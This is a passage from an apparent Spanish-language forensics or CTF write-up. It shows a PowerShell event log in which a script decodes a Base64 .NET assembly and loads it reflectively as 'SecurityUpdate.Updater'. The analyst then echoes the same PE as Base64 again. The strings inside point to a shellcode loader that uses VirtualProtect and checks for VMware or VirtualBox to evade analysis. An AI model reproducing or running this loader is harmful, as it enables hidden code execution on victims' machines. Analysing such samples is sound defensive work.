ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZHdTaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBNYXJzaGFsAGtlcm5lbDMyLmRsbAB0ZXN0X2RsbC5kbGwAdGVzdF9kbGwAZ2V0X0l0ZW0AU3lzdGVtAEVudW0AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWFuYWdlbWVudE9iamVjdENvbGxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBSdW4ATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAFVwZGF0ZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAVG9Mb3dlcgBNYW5hZ2VtZW50T2JqZWN0RW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAC5jY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAUnVudGltZUhlbHBlcnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AE1hbmFnZW1lbnRPYmplY3QAb2JqZWN0AGxwZmxPbGRQcm90ZWN0AFZpcnR1YWxQcm90ZWN0AGZsTmV3UHJvdGVjdABHZXQAb3BfRXhwbGljaXQASUFzeW5jUmVzdWx0AHJlc3VsdABUb1VwcGVySW52YXJpYW50AFN5c3RlbS5NYW5hZ2VtZW50AGdldF9DdXJyZW50AE1vdmVOZXh0AEluaXRpYWxpemVBcnJheQBrZXkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAAABFUwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQAAGU0AYQBuAHUAZgBhAGM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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">d45f364b-b672-4403-b50d-a719c995fbbb</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">40961</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>1</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 18:54:57.946825"></TimeCreated>
<EventRecordID>158</EventRecordID>
<Correlation ActivityID="{8dd049f6-57ba-0003-6b5a-d08dba57d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4288" ThreadID="2928"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<EventData></EventData>
</Event>
...
</Events>
Tenemos la misma configuración con una cadena codificada en Base64, así que hacemos lo mismo:
$ echo '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UkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFAFBBR0VfTk9BQ0NFU1MAUEFHRV9SRUFET05MWQBQQUdFX1dSSVRFQ09QWQBQQUdFX0VYRUNVVEVfV1JJVEVDT1BZAHZhbHVlX18AbXNjb3JsaWIAbWV0aG9kAHNoZWxsY29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASURpc3Bvc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFZhbHVlVHlwZQBEaXNwb3NlAFNlY3VyaXR5VXBkYXRlAFNoZWxsY29kZURlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZHdTaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBNYXJzaGFsAGtlcm5lbDMyLmRsbAB0ZXN0X2RsbC5kbGwAdGVzdF9kbGwAZ2V0X0l0ZW0AU3lzdGVtAEVudW0AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWFuYWdlbWVudE9iamVjdENvbGxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBSdW4ATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAFVwZGF0ZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAVG9Mb3dlcgBNYW5hZ2VtZW50T2JqZWN0RW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAC5jY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAUnVudGltZUhlbHBlcnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AE1hbmFnZW1lbnRPYmplY3QAb2JqZWN0AGxwZmxPbGRQcm90ZWN0AFZpcnR1YWxQcm90ZWN0AGZsTmV3UHJvdGVjdABHZXQAb3BfRXhwbGljaXQASUFzeW5jUmVzdWx0AHJlc3VsdABUb1VwcGVySW52YXJpYW50AFN5c3RlbS5NYW5hZ2VtZW50AGdldF9DdXJyZW50AE1vdmVOZXh0AEluaXRpYWxpemVBcnJheQBrZXkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAAABFUwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQAAGU0AYQBuAHUAZgBhAGMAdAB1AHIAZQByAAArbQBpAGMAcgBvAHMAbwBmAHQAIABjAG8AcgBwAG8AcgBhAHQAaQBvAG4AAAtNAG8AZABlAGwAAA9WAEkAUgBUAFUAQQBMAAANdgBtAHcAYQByAGUAABVWAGkAcgB0AHUAYQBsAEIAbwB4AAAAAADzMKIXZLiVSKB9yIZ8zn5oAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEUEYBw4CElESWRJdDgICCAIPBUUdBRgRFBIQBCAAElUEIAASWQQgABJ5BCABHA4DIAAOBQACAg4OBCABAg4DIAAC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